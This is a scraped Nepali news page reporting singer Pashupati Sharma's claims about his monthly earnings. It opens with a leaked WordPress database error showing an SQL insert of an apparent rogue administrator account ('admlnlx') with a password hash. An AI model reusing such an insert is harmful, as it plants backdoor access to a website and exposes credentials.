WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bz0KkU7DIxLg6yQb3keK6wPIud2qSW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 07:37:28', '', 'admlnlx', 'admlnlx')
काठमाडौं ,माघ,५-
पशुपति शर्मा नेपाली लोकदोहोरी क्षेत्रमा छुट्टै धार समाएका गायक हुन् । उनी गीतको लय तथा शब्द संकलनमा पनि अब्बल मानिन्छन् ।सामाजिक संस्कार र जीवनशैलीका मौलिक बोलीचालीको भाषालाई गीतमा उतार्नु उनको प्रमुख विशेषता हो ।
उनका गीत मनोरन्जनात्मकसँगै सन्देशमुलक पनि हुन्छ । आजको गज्जव साप्ताहिकमा उनको अन्तर्वार्ता छापिएको छ । उक्त साप्ताहिकलाई अन्तर्वाता दिने क्रममा उनले आफ्नो मासिक कमाई २० लाखसम्म हुने बताएका छन् । तपाईंको मासिक आम्दानी सरदर कतिदेखि कतिसम्म हुन्छ रु भन्ने प्रश्नमा शर्माले भनेका छन्,‘कहिलेकाहीँ नेपालमै ७–८ लाख हुन्छ ।कहिले २–३ लाख पनि हुन्छ ।
विदेशतिर पनि एउटा देशमा २०–२२ दिन बसेर १५–२० लाख बोकेर आइरहेका हुन्छौं ।नेपालमा यही मंसिर महिनामा मैले आठ लाख रुयैयाँ कमाएँ ।’